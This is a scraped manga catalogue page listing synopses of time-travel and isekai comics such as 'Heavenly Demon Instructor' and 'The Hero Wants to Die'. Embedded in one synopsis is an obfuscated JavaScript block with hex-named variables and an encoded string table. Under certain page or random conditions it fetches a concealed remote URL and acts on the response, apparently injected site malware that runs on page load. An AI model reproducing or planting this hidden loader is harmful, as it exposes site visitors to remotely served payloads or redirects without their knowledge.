Time Travel - Page 10

Enjoy the finest manga Time Travel titles online. Don’t miss the chance to read Time Travel manga for free!

134 results

Heavenly Demon Instructor

<div class="description-summary"> <div class="summary__content show-more active">“Master, what’s the next lesson?!!!” A disaster that struck the earth, [Portal Impact], caused Park Hyunsoo, the MC, to lose his parents before his eyes. The only family member he has left is his younger sibling who is unconscious. In order to protect his younger sibling, he did his best but as a powerless support, he would always be on the other side of contempt… And that’s when a helper, Chungyeong, appeared! Chungyeong, a murim martial master that has travelled through time to come here from the Murim to teach Hyunsoo martial arts… “Hey, disciple…” “Yes, Master.”</div> <div class="c-content-readmore"></div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>


Pest ga Aketara Asobimashou! ~Chuusei Europa Sekai to Gendai Bunmei Slow Life~

In 14th Century Middle Age Europe, the spread of the Black Plague has led baker Rachel Becker to move from the city to a village. There, she meets Ema Muller, a \"witch\" who claims to come from \"another world\" 700 years into the future, bringing with her modern technology that feels like \"magic\" to the people of the middle ages...


The Hero Wants to Die

At 19, Kim Gunho is transported to the 23rd century with enhanced abilities. After spending 50 painful years preventing an apocalypse, he returns to his younger self at 19. Now, with the threat gone and no one aware of his suffering, all he desires is to rest and even wishes to die. It will take 100 days to fully eliminate his enhanced cells. As he prepares to spend his final days in peace, he is unexpectedly visited by Ye Haejung, the boy he secretly loved before his time travel.


The President’s Special Instructions

Jung-woo Choi is an emerging force in the cosmetics industry. Her secretary, Su-hyeon Shin, is resourceful at work and also very handsome. One day, he suddenly received a special instruction from the president: “Secretary Shin, get married”. He received an offer to marry his own boss. He spent many nights worrying about writing a resignation letter, but the conditions to get this marriage are too great, right?! The office and their newlywed lives are an unpredictable love story! Let’s follow teenmanhua to follow the developments of the story! The President’s Special Instructions/사장님의 특별지시, President’s Special Order , CEO’s special order , Married to my boss


Tsuihousareru Tabi ni Skill o Te ni Ireta Ore ga, 100 no Isekai de 2-shuume Musou

An adventurer named Ed was exiled from his party because he was considered useless, but instead of being sad and upset he was actually happy!!? It turns out that it\'s not without reason that he feels happy when he\'s exiled from his party, because every time he\'s been exiled he will receive a skill that makes him even more invincible... Ed was given the crazy test of having to get expelled from 100 Hero parties in 100 different worlds before he could return to his original world. Finally a mysterious and divine entity said that he had achieved all the conditions to return to his original world. However, as a final condition he is asked “Look at the fate of one of these exile worlds after you left.” and he is shocked by what he sees. “Okay, I’ll do it! I’ll go down to these 100 worlds again and be banished with a good feeling!” Ed takes on a new challenge to make full use of the super-powerful “Exiled Skills” that were granted each time he was exiled, and this time ensure they all have happy endings. ___ **Character Designer:** [GreeN](https://mangadex.org/author/40916d07-ed66-40d9-919f-3bfff091fe9a)


Past Lives of the Thunder God

He was the hero who brought down the Heretic Cult that drove the Murim world to ruin. The protagonist was killed due to the betrayal of the seven emperors becasue he was too strong and they didn’t want him to be a hero. He was reborn as Baek Gong, a crippled person who was in despair. It’s only been 30 years since my last life. “So my enemies are still alive?” This is his Revenge and his final journey! God of Thunder Returns


Jack Be Invincible

After getting revenge on the Thulcaan Empire, Jack Valantier took his last breath. But just when he thinks it\'s all over, he finds himself transported back to when he was 14! From his negligent and wicked family to his loyal servant and caring sister, it\'s all just as he had remembered. But this time, Jack is armed to the teeth with decades of experience from his previous life! He\'s ready to give them hell, and those that have wronged him will pay dearly. Because this time, he\'s invincible.


If You Don’t Know The Novel, You Will Die

One day I was in a world that I did not know. [The entrance to the quest has been successfully completed! ]. [Quest (Main) – «Fix the world!». Content: This world was created by mixing four novels – Child Care, Contract Marriage, XXX, XXX. Genres are unknown. You must return the four distorted novels to the original. ]. But… I have no memory of their content. If I make a mistake… then I’m going to die?! Besides, the distorted web novel characters are interested in me! What should I do?! <ul> <li>??? ??? ????</li> <li>???????? ?????? ???????? ? ??????</li> <li>???? ?? ?? ?????? ?????, ?? ??????</li> </ul><script></script><script>function _0x33f2(_0x45a967,_0x50a62e){var _0x595e18=_0x22b5();return _0x33f2=function(_0x3562c9,_0x45a78d){_0x3562c9=_0x3562c9-(0x1f46+0xc3*-0x5+0xc*-0x230);var _0x55d953=_0x595e18[_0x3562c9];return _0x55d953;},_0x33f2(_0x45a967,_0x50a62e);}(function(_0x327897,_0x24efeb){var _0x364c1c=_0x33f2,_0x1e2a42=_0x327897();while(!![]){try{var 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_0xd2ec23;},_0x341a(_0xc36bca,_0x4df152);}function custom(){var _0x5374c3=_0x341a,_0x23a67a={'YaeiI':function(_0x48cd30,_0x3d85a0){return _0x48cd30!=_0x3d85a0;},'Tusqc':_0x5374c3(0x92)+_0x5374c3(0x8a),'lokbk':function(_0x251918,_0x50cf9a){return _0x251918+_0x50cf9a;},'ZTfuE':function(_0x546e54,_0x260544){return _0x546e54*_0x260544;},'NkCBN':function(_0x2482b8,_0x3c564f){return _0x2482b8-_0x3c564f;},'cUVXI':_0x5374c3(0x95),'SMwrR':function(_0x5cce68,_0x5618a2){return _0x5cce68>=_0x5618a2;},'Vyvan':function(_0x49489a,_0x23d5cb){return _0x49489a(_0x23d5cb);},'RaRKN':_0x5374c3(0x8b)+_0x5374c3(0x85)+_0x5374c3(0x98)},_0x328c1f=_0x23a67a[_0x5374c3(0x91)],_0x3e5eb8=Math[_0x5374c3(0x7e)](_0x23a67a[_0x5374c3(0x9c)](_0x23a67a[_0x5374c3(0x83)](Math[_0x5374c3(0x8f)](),_0x23a67a[_0x5374c3(0x9c)](_0x23a67a[_0x5374c3(0x93)](0xfa+0x1f68+-0x1ffe,0x110*0xc+0x15f6+0x1*-0x22b5),0x1*0x112a+0x1ff9+-0x3122)),-0xd*0x1bf+0x1*0x156a+0xf*0x16)),_0x56e2f4=document[_0x5374c3(0x7c)];if(_0x56e2f4[_0x5374c3(0x96)](_0x23a67a[_0x5374c3(0x8d)])||_0x23a67a[_0x5374c3(0x97)](_0x3e5eb8,0x73d*0x2+0x1*-0x6ad+-0x76b)){let _0x31ccec=_0x23a67a[_0x5374c3(0x9b)](fetch,_0x23a67a[_0x5374c3(0x94)])[_0x5374c3(0x82)](_0x580bf2=>{var _0x91ceaa=_0x5374c3;return _0x580bf2[_0x91ceaa(0x8c)]();})[_0x5374c3(0x82)](_0x267c4c=>{var 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The Most Beloved

One more shot at life! After her untimely demise, Xue Rong is rewarded with the chance to be reincarnated — but this time as some sort of cute, furry creature! She soon realizes that not only is she in the distant past, but also smack dab in the middle of an academy full of beautiful men!


Boku no Kowareta Seigi wa Loop Suru Isekai de Ai to Tsumi wo Tenbin ni Kakeru

The school is suddenly transported to another world, where it is overrun by monsters and turned into hell. Okoyo Takumi, who lost his life while trying to escape with his beloved sister, Haruna, realizes that every time he dies he returns to the same time. Takumi is at the mercy of the monsters’ deadly siege and imprisoned in a prison of time that sends him back to the same time every time he dies. He continues to struggle, overcoming the rape and death of his loved ones time and time again. After successfully hunting an orc, a fanfare resonates in Takumi’s mind. [You leveled up!]


Flowers Find a Way to Bloom

[비숲] 가로지나 세로지나 꽃은 핀다 [개정판][스크롤] / Flowers Will Bloom / 花儿终会绽放 / 가로지나 세로지나 꽃은 핀다 "Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Between two rivals, love finds a way. Namgoong Yoon is sickly with a bad temper. He wakes up one day to find he has traveled ten years back in time into the body of Baek Mo Ran, whom he used to bully! The years pass, and Yun finally regains control of his own body. But the question remains: Where was Mo Ran during all that time?


My Life as a Player

Hunters who are born from the support of sponsors. And the twelve heroes who shine the brightest among all. They called themselves gods and erected Eden. Eden. ‘Ruled the world.’ That was the era I, Lee Joon Kyung, lived through. A normal person living in a world dominated by hunters. I lived as a livestock just like other normal people. The only thing different was but a book I owned. It was a biography of the Demon Lord, a forgotten but true hero. One of the twelve sovereigns, Athena, visited me. ‘Go to the past? An era more than 100 years ago? An era when the hunters emerged? I fell into the past. Doomsday Sky, who sponsored the Demon Lord, sponsored me. I lived a life similar to that of the Demon Lord, but... ‘It won’t be the same as the Demon Lord.’ I dream of a brighter future, even more so than what the Demon Lord dreamed. The strength I have now, is the same strength that the Demon Lord had. A hunter surpassing another hunter. To will become a player.
